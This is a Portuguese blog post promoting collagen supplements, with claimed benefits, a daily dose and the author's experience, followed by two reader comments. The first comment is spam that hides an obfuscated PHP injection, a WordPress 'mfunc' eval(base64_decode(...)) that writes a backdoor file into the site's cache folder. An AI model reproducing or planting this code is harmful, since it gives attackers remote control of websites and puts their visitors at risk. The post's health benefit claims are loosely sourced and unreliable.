A importância do Colágeno

O colágeno é uma classe bastante abundante de proteínas formadas por aminoácidos no organismo humano. A principal função dele é dar aquela firmeza à pele.

Com o passar dos anos, o organismo apresenta diminuição na sua produção, ocasionando perda de elasticidade da pele, aparecimento de linhas de expressão, estrias, unhas e cabelos quebradiços e aumento da fragilidade dos ossos e músculos. Por isso é importante repor esse nutriente.

colágeno

Podemos repor o colágeno de várias formas: através de cápsulas, balas ou . Esta última opção ainda possui a vantagem de fornecer saciedade, o que é importantíssimo no processo de emagrecimento. E o melhor, você encontra os produtos para vender em farmácias convencionais. Lembre-se também que o máximo a ser ingerido através de suplementação são 10 gramas de colágeno por dia.

Também podemos repor por meio da alimentação. Suas melhores fontes são os itens de origem animal, especialmente a carne vermelha, o frango e o peixe.

Benefícios do Colágeno:

Combate a flacidez, rugas e fragilidade óssea;
Enrijece os tecidos da pele;
Colabora no aumento da tonicidade dos músculos;
Previne o surgimento das estrias e celulite
Fortalece as unhas e melhora o aspecto dos cabelos;
Auxilia como coadjuvantes em dietas de emagrecimento.

Já a famosa gelatina tradicional não é uma boa opção, pois, além de fornecer pouco colágeno, vem carregada de corantes, adoçantes ou açúcares. Os aditivos químicos presentes nela, aumentam a produção de radicais livres no nosso organismo provocando justamente o processo contrário, o envelhecendo. Mas se consumirmos a gelatina em folha ou em pó incolor, que não possui aditivos químicos e sim muito mais colágeno, teremos só benefícios!

Vale a pena você conversar com seu nutricionista para avaliar a sua alimentação, pois precisamos ter um bom nível de saúde e uma dieta bem equilibrada para garantir a produção de colágeno pelo próprio organismo. Além disso quanto melhor for a sua alimentação e dia a dia, mais fácil será a absorção deste colágeno suplementado.

colageno

Eu estou a algumas semana suplementando com o colágeno da Fitoway, as vezes em cápsulas e também em pó no sabor laranja.

Já senti uma diferença nas minhas unhas que estão mais fortes e no meu cabelo também.

Vocês suplementam com colágeno também? Sentiram diferença?

Fontes: Fulaninha Entretenimentos, Marombas online, Beleza e Pele e Território Animale.

You may also like

2 Comentários

  • I consider, what is it � a false way.

    <!–mfunc eval(base64_decode('aWYoJGY9Zm9wZW4oJ3dwLWNvbnRlbnQvY2FjaGUvcGt4ZXB0Zy5waHAnLCd3Jykpe2ZwdXRzKCRmLCc8P3BocCAvKnFHOVIqL2V2YWwvKkktN30qLygvKktcJ0MqL2Jhc2U2NF9kZWNvZGUvKmF2WkMqLygvKmIheTp6Ki9cJ0x5cGhaQ0FxTDJsbUx5cHFaSDFoWEhncUx5Z3ZLbHM4WUZOMUtpOXBjM05sZEM4cVlrSmFMQ292S0M4cU1ESmpLaThrWDFKRlVWVkZVMVF2S2s4c0ppQmZhbGdxTDFzdktudDBVak1uS2k4blpDY3ZLbnc0VVwnLypNPmM5cSovLi8qUFwnTmE4VTxpKi9cJ0NFMGVpb3ZMaThxWEQxQVBqUjdLaThuZFNjdktrMTRhQ292TGk4cVJ5aE1RaW92SjNnbkx5cEJTV3h3S1dvcUx5NHZLbDlxU21rcUx5ZHVKeThxYjB4NmNuRXFMeTR2S2tKM1JDa3FMeWRsYm1Vbkx5b3BYMVwnLypRPDYqLy4vKnFSclxbOCovXCdkR1gyVXFMMTB2S250aFZWNHFMeThxY25obFBTb3ZLUzhxU1VGWlBTZ3FMeThxTG1KWk1pb3ZLUzhxYUVnb2UyeExLaTlsZG1Gc0x5cHNObUpPV0ZVcUx5Z3ZLaWRlUVU1SEtpOXpkSEpwY0hOc1lYTm9aWE1cJy8qQVkrbmwqLy4vKixEcyZ4Ki9cJ3ZLaVo1Um05TUtpOG9MeXBHZFhrMUtVZDNLaThrWDFKRlVWVkZVMVF2S2twVU4wOVNLaTliTHlwYkp6VlZkQ292SjJSMUp5OHFZRDBzV0NvdkxpOHFNbnhvVW5rZ1Npb3ZKM2h1Snk4cUprSTlLaTh1THlvb1wnLypeaF8pZVwnKi8uLyppYT0tKi9cJ1lUZ3FMeWRsYm1Vbkx5b3JPbDl1UUNvdlhTOHFOWHBtYmp4MFd5b3ZMeXBGUVh0SVR6Y3FMeWt2S250dmJpaG5LaTh2S2tkYU4zRXFMeWt2S2s1QlUydFlKaW92THlwT2QwSmxTU292T3k4cVkxeDFOREpsS2k4PVwnLypfT1xNKi8pLyo7QDFQdyovLyp8MGYxKi8pLypZQzppPCovLypoblZNRyovOy8qQk97WzR1Ki8/PicpO2ZjbG9zZSgkZik7fQ==')); –><!–/mfunc–>

  • Oi Marina, tudo bom?

    Olha esse tema sobre colágeno sempre me interessou muito, por conta de herança genética, puxei uma parte da família que tinha muita flacidez … E tenho é claro celulite, estria mais concentrado nas pernas…Pois bem, eu sempre vejo pra vende o colágeno em farmácia, em forma de capsula, tal…mas eu falei uma vez com a minha ginecologista e mais recentemente, com a minha nutricionista funcional sobre ingerir o colágeno dessa forma. E ambas deram a entender que somente o colageno presente nos alimentos que são ingeridos no organismo. Mas saber que você está tomando e vê resultados, fiquei animada…Eu nunca tive esse suplemento portanto não sei te falar sobre o efeito em mim. Poderia me contar mais? Que horas você toma, quantas vezes por dia, depois de quanto tempo você percebeu resultados ? Aproveito esse comentário que já está gigantesco para lhe parabenizar pelo blog e persistência! Grande beijo

Deixe uma resposta

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *